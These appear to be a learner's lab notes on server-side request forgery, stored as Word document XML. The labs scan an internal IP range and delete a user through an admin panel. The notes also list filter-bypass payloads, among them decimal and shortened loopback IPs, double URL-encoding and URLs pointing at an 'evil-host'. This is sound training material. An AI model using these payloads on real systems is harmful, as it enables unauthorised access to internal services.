    <w:p w14:paraId="57958025" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="0075718D">
        <w:t>use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D61F279" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>If added http://</w:t>
      </w:r>
      <w:r w:rsidRPr="00D059BD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0075718D">
        <w:t>192.168.0.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1:8080/ it giving response </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE7ABF">
        <w:t>"Missing parameter"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>If added http://</w:t>
      </w:r>
      <w:r w:rsidRPr="00D059BD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0075718D">
        <w:t>192.168.0.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2:8080/ it giving response </w:t>
      </w:r>
      <w:r w:rsidRPr="0096473F">
        <w:t xml:space="preserve">Could not connect to external stock check </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">service and so on </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519FC188" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>So we are going to send it to intruder. And assigning range from 0-255.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D0535F" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="194D4327" wp14:editId="441600EA">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="150415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55698" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1B62F6" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>Now look for different response code , here IP 3 giving 404 page not found mean it running server on this IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B07686" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B2DF15E" wp14:editId="4C916D41">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="103350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05543" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BFAF98" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t xml:space="preserve">If we add URL </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00A92D24">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.0.3:8080/admin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> it giving access to admin page. Add we have found path to delete user carlos.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="021922BF" wp14:editId="19569B7B">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="214300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3154" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C04DE8" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A9789F7" wp14:editId="12948FC4">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="210174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45728" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4079A881" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>302 Found means user deleted, can check using follow redirection …/admin in burp repeater.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164233EF" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="04CF0DDA" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00FF2471" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF2471">
        <w:t>Circumventing common SSRF defenses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16531640" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="003E6F35" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="003E6F35">
        <w:t xml:space="preserve">It is common to see applications containing SSRF behavior together with defenses aimed at preventing malicious exploitation. Often, these defenses can be circumvented. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C89559E" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="003E6F35" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="003E6F35">
        <w:t>SSRF with blacklist-based input filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA64300" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="003E6F35" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="003E6F35">
        <w:t xml:space="preserve">Some applications block input containing hostnames like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can often circumvent the filter using the following techniques: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04651E1C" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00B26811" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00B26811">
        <w:t xml:space="preserve">Some applications block input containing hostnames like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26811">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26811">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26811">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26811">
        <w:t xml:space="preserve">, or sensitive URLs like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26811">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26811">
        <w:t xml:space="preserve">. In this situation, you can often circumvent the filter using the following techniques: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3640DA1C" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="004A2C0C" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2C0C">
        <w:t xml:space="preserve">Use an alternative IP representation of </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2C0C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2C0C">
        <w:t xml:space="preserve">, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2C0C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2130706433</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2C0C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2C0C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>017700000001</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2C0C">
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2C0C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>127.1</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2C0C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FC3804" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="004A2C0C" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2C0C">
        <w:t xml:space="preserve">Register your own domain name that resolves to </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2C0C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2C0C">
        <w:t xml:space="preserve">. You can use </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2C0C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>spoofed.burpcollaborator.net</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2C0C">
        <w:t xml:space="preserve"> for this purpose. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FDD51C" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="004A2C0C" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2C0C">
        <w:t xml:space="preserve">Obfuscate blocked strings using URL encoding or case variation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E55D21" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="004A2C0C" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A2C0C">
        <w:t xml:space="preserve">Provide a URL that you control, which redirects to the target URL. Try using different redirect codes, as well as different protocols for the target URL. For example, switching from an </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2C0C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>http:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2C0C">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="004A2C0C">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>https:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2C0C">
        <w:t xml:space="preserve"> URL during the redirect has been shown to bypass some anti-SSRF filters. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5432792E" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="2F5FAA69" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="041949AD" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="592C28EB" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00CF22B1" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00CF22B1">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2AAC9F" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="001629D7" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00CF22B1">
        <w:t xml:space="preserve">PRACTITIONER </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00CF22B1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>SSRF with blacklist-based input filter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CF22B1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Sol - </w:t>
      </w:r>
      <w:r w:rsidRPr="001629D7">
        <w:t xml:space="preserve">This lab has a stock check feature which fetches data from an internal system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162CFCCC" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00F91D9B">
        <w:t>change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EAD7F4" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="0A6B8E2D" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t xml:space="preserve">If we add </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00A92D24">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> it giving 404 </w:t>
      </w:r>
      <w:r w:rsidRPr="00170271">
        <w:t>"External stock check blocked for security reasons"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; so we are going to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26811">
        <w:t>circumvent the filter</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3A025A" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00A92D24">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> it giving "Invalid external stock check url 'Illegal character in authority at index 16: http://127.0.0.1'"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>-&gt; so circumvent it using 127.1 or decimal version of IP so this using online applications.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">127.0.0.1 -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00017A39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2130706433</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="685C0D2B" wp14:editId="2E7228F4">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="53172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29877" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7924C3" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t xml:space="preserve">Now we have accessed the server and admin location on server. </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">but for </w:t>
      </w:r>
      <w:r w:rsidRPr="00F56FC2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it also giving error</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">It checking for – URL decoding one time </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- regex search using a blacklist of strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51844686" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:br/>
        <w:t>so encode character a 2 times  in URL encode option in burp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A925BEB" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C99D58E" wp14:editId="64A29C46">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="179087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71873" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDD2D06" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>And delete carlos  ../delete?username=carlos</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D5214A7" wp14:editId="60EF21BC">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="204562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29570" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F15132D" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>302 good now follow redirection or /admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568D7093" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="0B249F55" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="007C35A5">
        <w:t>SSRF with whitelist-based input filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170130E3" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00CE7038">
        <w:t xml:space="preserve">Some applications only allow inputs that match, a whitelist of permitted values. The filter may look for a match at the beginning of the input, or contained within in it. You may be able to bypass this filter by exploiting inconsistencies in URL parsing. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BD2000" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00D85764" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00D85764">
        <w:t xml:space="preserve">The URL specification contains a number of features that are likely to be overlooked when URLs implement ad-hoc parsing and validation using this method: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298167EF" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00D85764" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D85764">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">You can embed credentials in a URL before the hostname, using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D85764">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidRPr="00D85764">
        <w:t xml:space="preserve"> character. For example: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647CFDAF" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00D85764" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D85764">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>https://expected-host:fakepassword@evil-host</w:t>
      </w:r>
      <w:r w:rsidRPr="00D85764">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1D15D1" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00D85764" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D85764">
        <w:t xml:space="preserve">You can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D85764">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00D85764">
        <w:t xml:space="preserve"> character to indicate a URL fragment. For example: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DAB457" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00D85764" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D85764">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>https://evil-host#expected-host</w:t>
      </w:r>
      <w:r w:rsidRPr="00D85764">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39453709" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00D85764" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D85764">
        <w:t xml:space="preserve">You can leverage the DNS naming hierarchy to place required input into a fully-qualified DNS name that you control. For example: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5D2E69" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00D85764" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D85764">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>https://expected-host.evil-host</w:t>
      </w:r>
      <w:r w:rsidRPr="00D85764">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CA3954" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00D85764" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D85764">
        <w:t xml:space="preserve">You can URL-encode characters to confuse the URL-parsing code. This is particularly useful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request. You can also try </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:anchor="obfuscation-via-double-url-encoding" w:history="1">
        <w:r w:rsidRPr="00D85764">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>double-encoding</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D85764">
        <w:t xml:space="preserve"> characters; some servers recursively URL-decode the input they receive, which can lead to further discrepancies. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D06146B" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D85764">
        <w:t xml:space="preserve">You can use combinations of these techniques together. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4A42F5" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="003E522A" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E522A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F79508" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="003E522A" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId27" w:anchor="1" w:history="1">
        <w:r w:rsidRPr="003E522A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>A new era of SSRF</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
